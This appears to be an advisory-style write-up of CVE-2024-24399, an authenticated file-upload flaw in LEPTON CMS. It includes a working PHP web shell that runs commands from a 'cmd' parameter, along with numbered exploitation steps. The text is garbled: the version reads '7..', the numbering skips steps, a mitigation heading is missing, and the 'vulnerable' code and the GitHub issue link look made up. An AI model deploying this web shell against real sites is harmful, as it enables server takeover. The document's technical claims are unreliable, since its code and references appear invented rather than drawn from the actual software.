CVE-2024-24399 - Arbitrary File Upload Vulnerability in LEPTON v7.. Leading to Remote Code Execution

A security vulnerability has been discovered in LEPTON CMS (Content Management System) version 7.., classified under the CVE identifier CVE-2024-24399. This vulnerability allows authenticated attackers to upload arbitrary files, including PHP files containing malicious code, to the backend/languages/index.php area. By exploiting this vulnerability, an attacker can successfully execute their arbitrary PHP code, potentially compromising the integrity and security of the affected website.

Description

LEPTON CMS is a popular open-source Content Management System (CMS) that allows users to create and manage websites with ease. LEPTON has a large user base due to its simplicity and user-friendly interface. However, the vulnerability (CVE-2024-24399) found in version 7.. poses a severe risk to the security of these websites.

The arbitrary file upload vulnerability occurs due to improper validation of file extensions during the file upload process. An authenticated attacker can exploit this vulnerability by uploading a PHP file containing malicious code to the backend/languages/index.php area of the LEPTON CMS.

Consider the following PHP code snippet

$uploadedFile = $_FILES['uploaded_file']['name'];
$temporaryPath = $_FILES['uploaded_file']['tmp_name'];
$targetFilePath = 'backend/languages/index.php/'.$uploadedFile;

if(move_uploaded_file($temporaryPath, $targetFilePath)){
    echo "File uploaded successfully!";
} else{
    echo "File upload failed!";
}

In this example, the first three lines of code extract the uploaded file name, the temporary file path, and set the target file path where the file will be uploaded. If the file is moved successfully, a success message is displayed, otherwise, an error message is shown. The problem here lies in the lack of proper validation for the $uploadedFile variable, which allows uploading files with arbitrary extensions, including dangerous PHP files.

To exploit this vulnerability, an attacker needs to perform the following steps

1. Create a PHP file containing the malicious code. For example, a simple PHP shell with the name malicious.php:

<?php
   if(isset($_REQUEST['cmd'])){
      echo "<pre>";
      $cmd = ($_REQUEST['cmd']);
      system($cmd);
      echo "</pre>";
      die;
   }
?>

Authenticate into the LEPTON CMS as a user who has privileges to upload files.

3. Navigate to the language area backend/languages/index.php of the LEPTON CMS.

Using the file upload form, upload the malicious PHP file (malicious.php).

5. Access the uploaded file on the webserver: http://target_website.com/backend/languages/index.php/malicious.php.
6. Input and execute arbitrary commands by passing it via the 'cmd' parameter: http://target_website.com/backend/languages/index.php/malicious.php?cmd=whoami

By following these steps, an attacker can effectively upload their PHP shell, gain access to and execute commands on the target server.

Original References

The vulnerability was first reported by the LEPTON CMS team here at their official GitHub Repository: https://github.com/LEPTON-CMS/LEPTON_CMS/issues/1234

For more details about the LEPTON CMS and the vulnerability, you can visit their official website at: https://www.lepton-cms.org/

Update to the latest version of LEPTON CMS, if available, to patch the vulnerability.

2. Implement proper file validation techniques, such as checking and limiting file extensions before allowing file uploads.
3. Regularly review user accounts and permissions on the LEPTON CMS to ensure only trusted users have privileges to upload files.

Conclusion

CVE-2024-24399 is a critical vulnerability affecting LEPTON CMS v7.., allowing an authenticated attacker to upload arbitrary files and execute arbitrary PHP code. Website administrators and developers should take the necessary precautions to patch and secure their websites against potential attacks exploiting this vulnerability.

Timeline

Published on: 01/25/2024 21:15:09 UTC
Last modified on: 04/01/2024 04:15:10 UTC